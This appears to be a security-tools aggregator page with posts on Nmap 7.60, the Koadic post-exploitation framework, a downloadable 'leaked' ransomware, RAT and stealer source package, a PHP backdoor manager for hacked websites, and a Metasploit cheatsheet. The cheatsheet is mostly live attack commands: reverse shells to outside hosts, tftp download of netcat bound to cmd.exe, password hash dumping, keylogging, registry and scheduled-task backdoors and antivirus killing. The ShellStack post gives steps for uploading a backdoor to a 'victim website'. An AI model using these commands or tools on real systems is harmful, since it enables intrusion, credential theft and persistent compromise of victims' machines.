Nmap 7.60 - Free Security Scanner For Network Exploration & Security Audits

Nmap ("Network Mapper") is a free and open source utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).

Nmap was named “Security Product of the Year” by Linux Journal, Info World, LinuxQuestions.Org, and Codetalker Digest. It was even featured in twelve movies, including The Matrix Reloaded, Die Hard 4, Girl With the Dragon Tattoo, and The Bourne Ultimatum.

Features

• Flexible: Supports dozens of advanced techniques for mapping out networks filled with IP filters, firewalls, routers, and other obstacles. This includes many port scanning mechanisms (both TCP & UDP), OS detection, version detection, ping sweeps, and more. See the documentation page.
• Powerful: Nmap has been used to scan huge networks of literally hundreds of thousands of machines.
• Portable: Most operating systems are supported, including Linux, Microsoft Windows, FreeBSD, OpenBSD, Solaris, IRIX, Mac OS X, HP-UX, NetBSD, Sun OS, Amiga, and more.
• Easy: While Nmap offers a rich set of advanced features for power users, you can start out as simply as "nmap -v -A targethost". Both traditional command line and graphical (GUI) versions are available to suit your preference. Binaries are available for those who do not wish to compile Nmap from source.
• Free: The primary goals of the Nmap Project is to help make the Internet a little more secure and to provide administrators/auditors/hackers with an advanced tool for exploring their networks. Nmap is available for free download, and also comes with full source code that you may modify and redistribute under the terms of the license.
• Well Documented: Significant effort has been put into comprehensive and up-to-date man pages, whitepapers, tutorials, and even a whole book! Find them in multiple languages here.
• Supported: While Nmap comes with no warranty, it is well supported by a vibrant community of developers and users. Most of this interaction occurs on the Nmap mailing lists. Most bug reports and questions should be sent to the nmap-dev list, but only after you read the guidelines. We recommend that all users subscribe to the low-traffic nmap-hackers announcement list. You can also find Nmap on Facebook and Twitter. For real-time chat, join the #nmap channel on Freenode or EFNet.
• Acclaimed: Nmap has won numerous awards, including "Information Security Product of the Year" by Linux Journal, Info World and Codetalker Digest. It has been featured in hundreds of magazine articles, several movies, dozens of books, and one comic book series. Visit the press page for further details.
• Popular: Thousands of people download Nmap every day, and it is included with many operating systems (Redhat Linux, Debian Linux, Gentoo, FreeBSD, OpenBSD, etc). It is among the top ten (out of 30,000) programs at the Freshmeat.Net repository. This is important because it lends Nmap its vibrant development and user support communities.

Changelog

• [Windows] Updated the bundled Npcap from 0.91 to 0.93, fixing several
issues with installation and compatibility with the Windows 10 Creators
Update.

• [NSE][GH#910] NSE scripts now have complete SSH support via libssh2,
including password brute-forcing and running remote commands, thanks to the
combined efforts of three Summer of Code students: [Devin Bjelland, Sergey
Khegay, Evangelos Deirmentzoglou]

• [NSE] Added 14 NSE scripts from 6 authors, bringing the total up to 579!
They are all listed at https://nmap.org/nsedoc/, and the summaries are
below:

   - ftp-syst sends SYST and STAT commands to FTP servers to get system
   version and connection information. [Daniel Miller]
   - [GH#916] http-vuln-cve2017-8917 checks for an SQL injection
   vulnerability affecting Joomla! 3.7.x before 3.7.1. [Wong Wai Tuck]
   - iec-identify probes for the IEC 60870-5-104 SCADA protocol. [Aleksandr
   Timorin, Daniel Miller]
   - [GH#915] openwebnet-discovery retrieves device identifying information
   and number of connected devices running on openwebnet protocol. [Rewanth
   Cool]
   - puppet-naivesigning checks for a misconfiguration in the Puppet CA
   where naive signing is enabled, allowing for any CSR to be automatically
   signed. [Wong Wai Tuck]
   - [GH#943] smb-protocols discovers if a server supports dialects NT LM
   0.12 (SMBv1), 2.02, 2.10, 3.00, 3.02 and 3.11. This replaces the old
   smbv2-enabled script. [Paulino Calderon]
   - [GH#943] smb2-capabilities lists the supported capabilities of
   SMB2/SMB3 servers. [Paulino Calderon]
   - [GH#943] smb2-time determines the current date and boot date of SMB2
   servers. [Paulino Calderon]
   - [GH#943] smb2-security-mode determines the message signing
   configuration of SMB2/SMB3 servers. [Paulino Calderon]
   - [GH#943] smb2-vuln-uptime attempts to discover missing critical
   patches in Microsoft Windows systems based on the SMB2 server uptime.
   [Paulino Calderon]
   - ssh-auth-methods lists the authentication methods offered by an SSH
   server. [Devin Bjelland]
   - ssh-brute performs brute-forcing of SSH password credentials. [Devin
   Bjelland]
   - ssh-publickey-acceptance checks public or private keys to see if they
   could be used to log in to a target. A list of known-compromised key pairs
   is included and checked by default. [Devin Bjelland]
   - ssh-run uses user-provided credentials to run commands on targets via
   SSH. [Devin Bjelland]

• [NSE] Removed smbv2-enabled, which was incompatible with the new SMBv2/3
improvements. It was fully replaced by the smb-protocols script.

• [Ncat][GH#446] Added Datagram TLS (DTLS) support to Ncat in connect
(client) mode with --udp --ssl. Also added Application Layer Protocol
Negotiation (ALPN) support with the --ssl-alpn option. [Denis Andzakovic,
Daniel Miller]

• Updated the default ciphers list for Ncat and the secure ciphers list for
Nsock to use "!aNULL:!eNULL" instead of "!ADH". With the addition of ECDH
ciphersuites, anonymous ECDH suites were being allowed. [Daniel Miller]

• [NSE][GH#930] Fix ndmp-version and ndmp-fs-info when scanning Veritas
Backup Exec Agent 15 or 16. [Andrew Orr]

• [NSE][GH#943] Added new SMB2/3 library and related scripts. [Paulino
Calderon]

• [NSE][GH#950] Added wildcard detection to dns-brute. Only hostnames that
resolve to unique addresses will be listed. [Aaron Heesakkers]

• [NSE] FTP scripts like ftp-anon and ftp-brute now correctly handle
TLS-protected FTP services and use STARTTLS when necessary. [Daniel Miller]

• [NSE][GH#936] Function url.escape no longer encodes so-called
"unreserved" characters, including hyphen, period, underscore, and tilde,
as per RFC 3986. [nnposter]

• [NSE][GH#935] Function http.pipeline_go no longer assumes that persistent
connections are supported on HTTP 1.0 target (unless the target explicitly
declares otherwise), as per RFC 7230. [nnposter]

• [NSE][GH#934] The HTTP response object has a new member, version, which
contains the HTTP protocol version string returned by the server, e.g.
"1.0". [nnposter]

• [NSE][GH#938] Fix handling of the objectSID Active Directory attribute by
ldap.lua. [Tom Sellers]

• [NSE] Fix line endings in the list of Oracle SIDs used by
oracle-sid-brute. Carriage Return characters were being sent in the
connection packets, likely resulting in failure of the script. [Anant
Shrivastava]

• [NSE][GH#141] http-useragent-checker now checks for changes in HTTP
status (usually 403 Forbidden) in addition to redirects to indicate
forbidden User Agents. [Gyanendra Mishra]

Download Nmap 7.60

Read More

COM Command & Control: Koadic

Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).

Koadic also attempts to be compatible with both Python 2 and Python 3.

Stagers

Stagers hook target zombies and allow you to use implants.

Module	Description
stager/js/mshta	serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr	serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js	serves payloads in memory using rundll32.exe
stager/js/disk	serves payloads using files on disk

Implants

Implants start jobs on zombies.

Module	Description
implant/elevate/bypassuac_eventvwr	Uses enigma0x3’s eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
implant/elevate/bypassuac_sdclt	Uses enigma0x3’s sdclt.exe exploit to bypass UAC on Windows 10.
implant/fun/zombie	Maxes volume and opens The Cranberries YouTube in a hidden window.
implant/fun/voice	Plays a message over text-to-speech.
implant/gather/clipboard	Retrieves the current content of the user clipboard.
implant/gather/hashdump_sam	Retrieves hashed passwords from the SAM hive.
implant/gather/hashdump_dc	Domain controller hashes from the NTDS.dit file.
implant/inject/mimikatz_dynwrapx	Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
implant/inject/mimikatz_dotnet2js	Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
implant/inject/shellcode_excel	Runs arbitrary shellcode payload (if Excel is installed).
implant/manage/enable_rdesktop	Enables remote desktop on the target.
implant/manage/exec_cmd	Run an arbitrary command on the target, and optionally receive the output.
implant/pivot/stage_wmi	Hook a zombie on another machine using WMI.
implant/pivot/exec_psexec	Run a command on another machine using psexec from sysinternals.
implant/scan/tcp	Uses HTTP to scan open TCP ports on the target zombie LAN.
implant/utils/download_file	Downloads a file from the target zombie.
implant/utils/upload_file	Uploads a file from the listening server to the target zombies.

Download Koadic

Read More

Collection Package Ramsonware, Malware, BotNet - Pr1v8 Source Code Leaked

Please note, I am not responsible for your actions.

Ransomware is a type of malicious software from cryptovirology that threatens to publish the victim's data or perpetually block access to it unless a ransom is paid. While some simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse, more advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them. In a properly implemented cryptoviral extortion attack, recovering the files without the decryption key is an intractable problem – and difficult to trace digital currencies such as Ukash and Bitcoin are used for the ransoms, making tracing and prosecuting the perpetrators difficult.

A remote administration tool (RAT) is a piece of software or programming that allows a remote "operator" to control a system as if they have physical access to that system. While desktop sharing and remote administration have many legal uses, "RAT" software is usually associated with criminal or malicious activity. Malicious RAT software is typically installed without the victim's knowledge, often as payload of a Trojan horse, and will try to hide its operation from the victim and from security software

Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored. Keylogging can also be used to study human–computer interaction. Numerous keylogging methods exist: they range from hardware and software-based approaches to acoustic analysis.

Stealers the term info stealer is self-explanatory. This type of malware resides in an infected computer and gathers data in order to send it to the attacker. Typical targets are credentials used in online banking services, social media sites, emails, or FTP accounts.



Source: Wikipedia
Password: seginfo

By OffSec 2017

Download Collection Package

Read More

Search for Code Cave in All Binaries (ELF, PE and Mach-o) and Inject Payload - CAVE MINER

This tools search for code cave in binaries (Elf, Mach-o, Pe), and inject code in them.

Features

• Find code caves in ELF, PE and Mach-o
• Use custom bytes for the search (ex: 0xCC can be used as nullbytes on PE)
• See virtual address of the code cave.
• See the permissions of the code caves.
• Search custom cave size
• Inject the payload into the binary

Dependencies

• Python2.7

Installation

pip install cave-miner

Exemple

Download CAVE MINER

Read More

VoIP Penetration Testing and Exploitation Kit - Viproy

Viproy Voip Pen-Test Kit provides penetration testing modules for VoIP networks. It supports signalling analysis for SIP and Skinny protocols, IP phone services and network infrastructure. Viproy 2.0 is released at Blackhat Arsenal USA 2014 with TCP/TLS support for SIP, vendor extentions support, Cisco CDP spoofer/sniffer, Cisco Skinny protocol analysers, VOSS exploits and network analysis modules. Furthermore, Viproy provides SIP and Skinny development libraries for custom fuzzing and analyse modules.

Current Version and Updates
Current version: 4.1 (Requires ruby 2.1.X and Metasploit Framework Github Repo)
Pre-installed repo: https://github.com/fozavci/metasploit-framework-with-viproy

Homepage of Project
http://viproy.com

Talks

Black Hat USA 2016 - VoIP Wars: The Phreakers Awaken
https://www.slideshare.net/fozavci/voip-wars-the-phreakers-awaken
https://www.youtube.com/watch?v=rl_kp5UZKlw

DEF CON 24 - VoIP Wars: The Live Workshop
To be added later

Black Hat Europe 2015 - VoIP Wars: Destroying Jar Jar Lync
http://www.slideshare.net/fozavci/voip-wars-destroying-jar-jar-lync-unfiltered-version
https://youtu.be/TMdiXYzY8qY

DEF CON 23 - The Art of VoIP Hacking Workshop Slide Deck
http://www.slideshare.net/fozavci/the-art-of-voip-hacking-defcon-23-workshop
https://youtu.be/hwDD7K9oXeI

Black Hat USA 2014 / DEF CON 22 - VoIP Wars: Attack of the Cisco Phones
https://www.youtube.com/watch?v=hqL25srtoEY

DEF CON 21 - VoIP Wars: Return of the SIP
https://www.youtube.com/watch?v=d6cGlTB6qKw

Attacking SIP/VoIP Servers Using Viproy
https://www.youtube.com/watch?v=AbXh_L0-Y5A

Current Testing Modules

• SIP Register
• SIP Invite
• SIP Message
• SIP Negotiate
• SIP Options
• SIP Subscribe
• SIP Enumerate
• SIP Brute Force
• SIP Trust Hacking
• SIP UDP Amplification DoS
• SIP Proxy Bounce
• Skinny Register
• Skinny Call
• Skinny Call Forward
• CUCDM Call Forwarder
• CUCDM Speed Dial Manipulator
• MITM Proxy TCP
• MITM Proxy UDP
• Cisco CDP Spoofer
• Boghe VoIP Client INVITE PoC Exploit (New)
• Boghe VoIP Client MSRP PoC Exploit (New)
• SIP Message with INVITE Support (New)
• Sample SIP SDP Fuzzer (New)
• MSRP Message Tester with SIP INVITE Support (New)
• Sample MSRP Message Fuzzer with SIP INVITE Support (New)
• Sample MSRP Message Header Fuzzer with SIP INVITE Support (New)

Documentation

Installation
Copy "lib" and "modules" folders' content to Metasploit root directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) should contains the following lines
require 'msf/core/auxiliary/sip'
require 'msf/core/auxiliary/skinny'
require 'msf/core/auxiliary/msrp'

Usage of SIP Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SIPUSAGE.md

Usage of Skinny Modules
https://github.com/fozavci/viproy-voipkit/blob/master/SKINNYUSAGE.md

Usage of Auxiliary Viproy Modules
https://github.com/fozavci/viproy-voipkit/blob/master/OTHERSUSAGE.md

Download Viproy

Read More

A PHP Based Tool That Helps You To Manage All Your Backdoored Websites Efficiently - ShellStack

ShellStack is a PHP based backdoor management tool. This Tool comes handy for "HACKERS" who wish to keep a track of every website they hack. The tool generates a backdoor file which you just have to upload to the site and put the backdoor URL in the shells.txt present in the tool's directory.

With ShellStack You can

• Import PHP Shells
• Get Server Details
• Upload Files From Your System using your terminal
• And Above all You Can Manage Your Backdoors Efficiently

How To Use

1. git clone https://github.com/Tuhinshubhra/shellstack
2. cd shellstack
3. php shellstack.php
4. generatebd and exit the tool use CTRL + C - This will generate a backdoor file in the same directory as of the tool in a file named backdoor.php
5. Upload The Backdoor File To The Victim website
6. Copy The Backdoor URL and paste it in the shells.txt file present in the tool's directory and save it (Each backdoor is separated by a new line)
7. php shellstack.php
8. Enter The Serial No Assigned To The Backdoor
9. Rest is pretty Self explanatory

Watch The Video Here: https://youtu.be/umk3ZNZ5Y1I

Requirements

php
curl 

Example

root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php


________________________________________________________________________________
_______ _     _ _______               _______ _______ _______ _______ _     _
|______ |_____| |______ |      |      |______    |    |_____| |       |____/
______| |     | |______ |_____ |_____ ______|    |    |     | |_____  |    \_
________________________________________________________________________________

                    Simple Backdoor Management System
                    Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra 
                    Shout Out: LulZSec India  
================================================================================



List Of Backdoors:

0. http://localhost/backdoor.php
=============================================

[#] Enter Either Of These (Backdoor No.|help|generatebd) : 0

[+] Shell Selected: http://localhost/backdoor.php
[+] Validating Backdoor: Backdoor Found!

List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):2

[+] Server Info
[i] Sending Request And Getting Response...
[i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64
[i] Server IP: 127.0.0.1


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):1


List Of Shells
===============
[1] Dhanush shell {User & Pass : shellstack123}
[2] B374K shell {Pass : shellstack123}
[3] Kurama shell V.1.0 {Pass : red}
[4] WSO shell {Pass : shellstack123}
[5] MiNi shell {User & Pass : shellstack123}

[#] Select Shell To Import(1-5):1


[i] Importing Shell...
[i] Sending Request And Getting Response...
[R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php


Press Enter To Continue


List Of Actions
================
[1] Import PHP Shells
[2] Server Details
[3] Remove Backdoor
[4] Remote File Upload
[5] Exit

[#] Select Option(1|2|3|4|5):5
root@R3D_MACH1N3:/home/redhaxor/Desktop/shellstack# 

Release(s)

Version 1.0 On 14-06-2017

Screenshot

Download ShellStack

Read More

Avoid being scanned by spoiling movies on all your ports! - spoilerwall

Spoilerwall introduces a brand new concept in the field of network hardening. Avoid being scanned by spoiling movies on all your ports!
Firewall? How about Fire'em'all! Stop spending thousand of dollars on big teams that you don't need! Just fire up the Spoilers Server and that's it!

Movie Spoilers DB + Open Ports + Pure Evil = Spoilerwall

Set your own:

1. Clone this repo

$ git clone git@github.com:infobyte/spoilerwall.git

2. Edit the file server-spoiler.py and set the HOST and PORT variables.
   
3. Run the server
   

$ python2 server-spoiler.py

The server will listen on the selected port (8080 by default). Redirect incoming TCP traffic in all ports to this service by running:

iptables -A PREROUTING -t nat -i eth0 -p tcp --dport 1:65535 -j DNAT --to-destination {HOST}:{PORT}

Change {HOST} and {PORT} for the values set in step (2). Also, if the traffic is redirected to localhost, run:

sysctl -w net.ipv4.conf.eth0.route_localnet=1

Using this config, an nmap scan will show every port as open and a spoiler for each one.
View the live demo running in spoilerwall.faradaysec.com

~ ❯❯❯ telnet spoilerwall.faradaysec.com 23

Trying 138.197.196.144...

Connected to spoilerwall.faradaysec.com.

Escape character is '^]'.

Gummo

Fucked up people killing cats after a tornado

Connection closed by foreign host.

Browse in Shodan (but beware of the Spoilers!):
https://www.shodan.io/host/138.197.196.144
Be careful in your next CTF - you never know when the spoilers are coming!

Download spoilerwall

Read More

Metasploit Cheatsheet

Metasploit Cheatsheet

Cheat sheet of Metasploit… Commands are as follows..

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST rmccurdy.com

set LPORT 21

set ExitOnSession false

# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

# file_autopwn

rm -Rf /tmp/1

mkdir /tmp/1

rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR…s/nga10_02.pdf

./msfconsole

db_driver sqlite3

db_create pentest11

setg LHOST 75.139.158.51

setg LPORT 21

setg SRVPORT 21

setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf

set SSL true

set ExitOnSession false

set PAYLOAD windows/meterpreter/reverse_tcp

setg PAYLOAD windows/meterpreter/reverse_tcp

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

run

# shows all the scripts

run

# persistence! broken …if you use DNS name ..

run persistence -r 75.139.158.51 -p 21 -A -X -i 30

run get_pidgin_creds

idletime

sysinfo

# SYSTEM SHELL ( pick a proc that is run by system )

migrate 376

shell

# session hijack tokens

use incognito

impersonate_token “NT AUTHORITY\\SYSTEM”

# escalate to system

use priv

getsystem

execute -f cmd.exe -H -c -i -t

execute -f cmd.exe -i -t

# list top used apps

run prefetchtool -x 20

# list installed apps

run prefetchtool -p

run get_local_subnets

# find and download files

run search_dwld “%USERPROFILE%\\my documents” passwd

run search_dwld “%USERPROFILE%\\desktop passwd

run search_dwld “%USERPROFILE%\\my documents” office

run search_dwld “%USERPROFILE%\\desktop” office

# alternate

download -r “%USERPROFILE%\\desktop” ~/

download -r “%USERPROFILE%\\my documents” ~/

# alternate to shell not SYSTEM

# execute -f cmd.exe -H -c -i -t

# does some run wmic commands etc

run winenum

# rev shell the hard way

run scheduleme -m 1 -u /tmp/nc.exe -o “-e cmd.exe -L -p 8080”

# An example of a run of the file to download via tftp of Netcat and then running it as a backdoor.

run schtasksabuse-dev -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

run schtasksabuse -t 192.168.1.7 -c “tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe” -d 4

# vnc / port fwd for linux

run vnc

# priv esc

run kitrap0d

run getgui

# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!

run killav

run winemun

run memdump

run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system32 -d “C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe”

reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v system32

reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list

reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys

reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32

upload /neo/wallpaper1.bmp “C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\”

getuid

ps

getpid

keyscan_start

keyscan_dump

migrate 520

portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80″

portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666

shell

run myremotefileserver_mserver -h

run myremotefileserver_mserver -p 8787

run msf_bind

run msf_bind -p 1975

rev2self

getuid

getuid

enumdesktops

grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump

run metsvc

run scraper

run checkvm

run keylogrecorder

run netenum -fl -hl localhostlist.txt -d google.com

run netenum -rl -r 10.192.0.50-10.192.0.254

run netenum -st -d google.com

run netenum -ps -r 10.192.0.50-254

# Windows Login Brute Force Meterpreter Script

run winbf -h

# upload a script or executable and run it

uploadexec

# Using Payload As A Backdoor from a shell

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d “c:\windows\system32\metabkdr.exe” /f

at 19:00 /every:M,T,W,Th,F cmd /c start “%USERPROFILE%\metabkdr.exe”

SCHTASKS /Create /RU “SYSTEM” /SC MINUTE /MO 45 /TN FIREWALL /TR “%USERPROFILE%\metabkdr.exe” /ED 11/11/2011

# kill AV this will not unload it from mem it needs reboot or kill from memory still … 

Darkspy, Seem, Icesword GUI can kill the tasks

catchme.exe -K “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -E “c:\Program Files\Kaspersky\avp.exe”

catchme.exe -O “c:\Program Files\Kaspersky\avp.exe” dummy

Offsec 

Read More